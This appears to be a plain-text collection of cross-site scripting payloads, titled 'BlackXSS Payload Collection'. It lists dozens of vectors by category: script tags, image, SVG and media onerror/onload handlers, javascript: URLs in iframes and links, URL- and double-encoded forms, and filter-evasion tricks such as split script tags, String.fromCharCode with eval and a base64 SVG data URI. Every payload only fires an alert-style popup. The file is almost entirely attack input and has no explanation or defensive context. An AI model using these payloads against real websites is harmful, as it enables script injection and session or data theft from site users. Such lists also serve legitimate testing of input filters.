# BlackXSS Payload Collection
# Author: Fakhar Saleem
# 
# Basic XSS Vectors
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert("XSS")</script>
<script>prompt('XSS')</script>
<script>confirm('XSS')</script>

# Image-based XSS
<img src=x onerror=alert('XSS')>
<img src="x" onerror="alert('XSS')">
<img src=x onerror=alert(1)>
<img/src=x onerror=alert('XSS')>

# SVG-based XSS  
<svg onload=alert('XSS')>
<svg/onload=alert('XSS')>
<svg onload=alert(1)>

# Input-based XSS
<input type="image" src="x" onerror="alert('XSS')">
<input autofocus onfocus=alert('XSS')>

# Event handlers
<body onload=alert('XSS')>
<div onmouseover="alert('XSS')">
<a href="javascript:alert('XSS')">

# IFrame XSS
<iframe src=javascript:alert('XSS')>
<iframe src="javascript:alert('XSS')">
<iframe src="javascript:alert('HACKED')">

# JavaScript URLs
javascript:alert('XSS')
javascript:alert(1)
javascript:prompt('XSS')

# Encoded payloads
%3Cscript%3Ealert('XSS')%3C/script%3E
&lt;script&gt;alert('XSS')&lt;/script&gt;

# Advanced vectors
<marquee onstart=alert('XSS')>
<details open ontoggle=alert('XSS')>
<video poster=javascript:alert('XSS')>

# Double encoded
%253Cscript%253Ealert('XSS')%253C/script%253E

# Filter bypass attempts
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">

# Common filter evasion
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=this.src='data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoJ1hTUycpPjwvc3ZnPg=='>

# HTML5 vectors
<audio src=x onerror=alert('XSS')>
<video src=x onerror=alert('XSS')>
<source src=x onerror=alert('XSS')>

# Form-related
<select onfocus=alert('XSS')>
<textarea onfocus=alert('XSS')>
<keygen onfocus=alert('XSS')>

# CSS injection attempts  
<style>@import'javascript:alert("XSS")';</style>
<link rel=stylesheet href=javascript:alert('XSS')>

# Data URLs
data:text/html,<script>alert('XSS')</script>